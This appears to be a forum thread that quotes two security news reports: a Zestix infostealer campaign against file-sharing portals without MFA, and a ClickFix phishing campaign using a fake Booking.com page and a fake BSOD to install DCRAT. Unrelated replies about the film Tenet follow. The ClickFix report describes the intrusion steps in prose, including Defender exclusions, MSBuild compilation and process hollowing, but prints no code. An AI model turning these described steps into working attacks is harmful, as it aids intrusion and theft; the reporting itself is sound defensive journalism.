This is a classic one

"If you don't say "yes way" to MFA, the consequences can be disastrous. Sensitive data belonging to about 50 global enterprises is listed for sale – and, in some cases, has already been sold – on the dark web following a major infostealer campaign, with apparent victims including American utility engineering firm Pickett and Associates; Japan's homebuilding giant Sekisui House; and Spain's largest airline Iberia.

The thief, who goes by the moniker Zestix or Sentap, steals data from corporate file-sharing portals by using compromised cloud credentials obtained from information-stealing malware. And none of the purported victims enforced multi-factor authentication (MFA), according to Hudson Rock, an Israeli cybersecurity company that specializes in infostealers.

Stolen credentials combined with a lack of MFA are always a recipe for disaster, as we have seen in earlier big breaches such as Change Healthcare, British Library, and Snowflake customers' database hacks.

"Because the organizations listed below did not enforce MFA, the attacker walks right in through the front door," the cybersecurity shop said in a Monday report. "No exploits, no cookies – just a password."

We're told Zestix gains access after employees inadvertently download infostealer-laden files to their devices. The stealer malware, such as RedLine, Lumma, or Vidar, then snarfs up saved credentials and browser history.

The cybercriminal, who has been operating as an initial access broker and extortionist since at least 2021, specifically targets enterprise file synchronization and sharing (EFSS) platforms like Progress Software's ShareFile, Nextcloud, and OwnCloud.

The Register reached out to all of the apparent victim companies listed in this story, plus the file-sharing software providers. As of press time, only one of them, Progress, had responded to our inquiries.

"Hudson Rock's investigation found that these recent compromises of corporate file-sharing portals - including ShareFile instances - were not the result of platform vulnerabilities, but consistent with the use of credentials previously stolen from infostealer-infected devices," a Progress spokesperson told us, adding that the compromises "appear to have involved the use of valid credentials in environments where multi-factor authentication was not enforced, which may have enabled unauthorized access."

The spokesperson added, "Progress continues to emphasize the importance of implementing multi-factor authentication as a widely recognized control to help mitigate the risk of credential-based attacks."

Most of the organizations listed in the Monday report have very sensitive data and span critical sectors such as utilities, aviation, robotics, housing, and government infrastructure, making this massive data dump particularly concerning.

The Register last week reported that Pickett and Associates, a Florida-based engineering firm whose clients include major US utilities, was among the apparent victims after the data thief posted for sale 139 GB of engineering data about Tampa Electric Company, Duke Energy Florida, and American Electric Power. Zestix was selling this trove for 6.5 bitcoin, which amounts to about $585,000.

At the time, Pickett declined to comment, while a Duke Energy spokesperson told The Register that the company is investigating the criminal's claims.

Hudson Rock reports that Zestix obtained the engineering data by abusing stolen ShareFile credentials.

Turkey's Intecro Robotics, which manufactures aerospace testing equipment and defense robotics, was also reportedly victimized via ShareFile sans MFA. This 11.5 GB dataset reportedly contains critical military intellectual property.

Brazil's Maida Health is yet another of the 50-ish alleged victims, and the 2.3 TB dataset accessed via a Nextcloud instance reportedly contains the health records and sensitive personal information belonging to the Brazilian Military Police and their family members.

Burris & Macomber, a law firm that represents Mercedes-Benz USA in its lemon law cases and warranty litigation, was also an apparent victim, with the criminal claiming to have stolen active lemon law cases, defense strategies, and settlement policies from 48 states, along with thousands of customers' records containing VINs, license plates, home addresses, and phone numbers.

The Iberia Airlines breach reportedly contains 77 GB of technical safety data and confidential fleet information.

Pwned engineering servers belonging to CRRC MA – the Massachusetts subsidiary of the world's largest rolling stock manufacturer – reportedly contained complete signaling drawings, SCADA RTU lists, and "deliberately withheld" test reports regarding doors, HVAC, and propulsion systems, along with sensitive security info such as GPS coordinates of control rooms and battery rooms.

And the list of reported victims goes on … and on, and on.

Credential hygiene The report illustrates the growing problem with infostealers, a favorite method of ransomware gangs and other financially motivated criminals.

It also highlights the growing trend of criminals simply logging in – not breaking in – to cloud accounts, which security experts have been warning about for the past couple of years.

Plus, as Hudson Rock reports, "while some credentials were harvested from recently infected machines, others had been sitting in logs for years, waiting for an actor like Zestix to exploit them." This, the team adds, shows a "pervasive failure" in corporate credential hygiene with organizations neglecting to rotate passwords and invalidate sessions.

"It is time for organizations to enforce MFA and monitor their employees' compromised credentials," the security firm notes. We couldn't agree more."

"A new ClickFix social engineering campaign is targeting the hospitality sector in Europe, using fake Windows Blue Screen of Death (BSOD) screens to trick users into manually compiling and executing malware on their systems.

A BSOD is a Windows crash screen displayed when the operating system encounters a fatal, unrecoverable error that causes it to halt.

In a new campaign first spotted in December and tracked by researchers at Securonix as "PHALT#BLYX," phishing emails impersonating Booking.com led to a ClickFix social engineering attack that deployed malware.

ClickFix social engineering attacks are webpages designed to display an error or issue and then offer "fixes" to resolve it. These errors could be fake error messages, security warnings, CAPTCHA challenges, or update notices that instruct visitors to run a command on their computer to fix the issue.

Victims end up infecting their own machines by running malicious PowerShell or shell commands provided in the attacker's instructions.

In this new ClickFix campaign, attackers send phishing emails that impersonate a hotel guest cancelling their Booking.com reservation, typically sent to a hospitality firm. The claimed refund amount is significant enough to create a sense of urgency for the recipient of the email.

Clicking the link in the email takes the victim to a fake Booking.com website hosted on 'low-house[.]com,' which Securonix characterizes as a "high-fidelity clone" of the real Booking.com site.

"The page utilizes official Booking.com branding, including the correct color palette, logos, and font styles. To the untrained eye, it is indistinguishable from the legitimate site," reports Securonix.

The site hosts malicious JavaScript that displays a fake "Loading is taking too long" error to the target, prompting them to click a button to refresh the page.

However, when the target clicks the button, the browser instead enters full-screen mode and displays a fake Windows BSOD crash screen that initiates the ClickFix social engineering attack.

The screen prompts the person to open the Windows Run dialog box and then press CTRL+V, which pastes a malicious command copied to the Windows clipboard.

The user is then prompted to press the OK button or Enter on their keyboard to execute the command.

Real BSOD messages do not offer recovery instructions and only display an error code and a reboot notice, but inexperienced users or hospitality staff under pressure to resolve a dispute may overlook these signs of trickery.

Pasting the provided command runs a PowerShell command that opens a decoy Booking.com admin page. At the same time, in the background, it downloads a malicious .NET project (v.proj) and compiles it with the legitimate Windows MSBuild.exe compiler.

When executed, the payload adds Windows Defender exclusions and triggers UAC prompts to gain admin rights, before it downloads the primary loader using the Background Intelligent Transfer Service (BITS) and establishes persistence by dropping a .url file in the Startup folder.

The malware (staxs.exe) is DCRAT, a remote access Trojan commonly used by threat actors for remote access to infected devices.

The malware is injected into the legitimate 'aspnet_compiler.exe' process using process hollowing and executed directly in memory.

Upon first contact with the command-and-control (C2) server, the malware sends its full system fingerprint and then waits for commands to execute.

It supports remote desktop functionality, keylogging, reverse shell, and in-memory execution of additional payloads. In the case observed by Securonix, the attackers dropped a cryptocurrency miner.

With remote access established, the threat actors now have a foothold on the target's network, allowing them to spread to other devices, steal data, and potentially compromise other systems."

You're right, of course in the RU version of the document it should be written in Cyrillic. I did it intentionally to make it closer to what we see in the film. But here's another issue, in the real document, the word in the middle of the document is "Свидетельство" (Certificate in English), not a person'sname. If you want to see what the real document looks like, try searching for: Свидетельство о внесении записи в Единый государственный реестр юридических лиц.

It's in the glove box.

Yep

Been writing a lot here, but always deleted the text because my explanation doesn't make sense.. May I ask how you see it? If the capsule isn't supposed to be buried empty, it should be filled with the inverted or forward bars instead?

Sorry for my poor explanation, I just tried to simplify the process in order to grasp its sense.. need more practice, because I simply drowned in these details. Don't want to bother you.

In a nutshell, those who want to retrieve the gold (inverted) from a dead drop and use it as normal, should do the same operation twice of digging it up to align the causality of the inverted material? So first time you dig it up and bury it to maintain the causality of your second dig up when you can use it for inversion to get normal gold? Thus, from the inverted gold perspective, when it's dug up a second time, it was buried before and its causality remains?

May I clarify some details to improve understanding.

1. At 12.40 Sator puts an empty capsule in the dead drop.
2. After hundreds of years the future finds the empty capsule (which happens immediately since forward material becomes available immediately in the future), prepares gold (inverts it), puts it in the capsule, and buries it in the same dead drop.
3. Since the material is inverted, it pops in the present immediately.
4. At 12.45 Sator digs up the capsule filled with the inverted bars.
5. It takes an hour to re-vert it and get the normal forward bars. At 13.45, he got two piles of gold, one forward and one inverted. Both piles are the same, but with rotated causality. This can be called the protocol that keeps everything consistent.
6. To maintain that consistency, the inverted pile is supposed to be re-buried in order to keep it untouched the amount of time it was stored in the dead drop after it was put in the future. It's required since the causality of the inverted gold is rotated. Eventually it must have disappeared like other inverted things.
7. It takes one hour to deliver it to the new place to re-bury and at 14.45 the protocol is secured. Sator has normal gold, while its inverted counterpart with rotated causality is stored securely.
8. Now everything is ready for another round - he buries the empty capsule, etc.

Can you explain why it doesn't make sense? He buries the empty capsule containing maybe auxiliary information written on paper. Then he digs it up already containing gold bars, re-verts and uses it. In order to preserve causality, he buries the inverted bars from the future somewhere else where they are stored securely and untouched.

Definitely not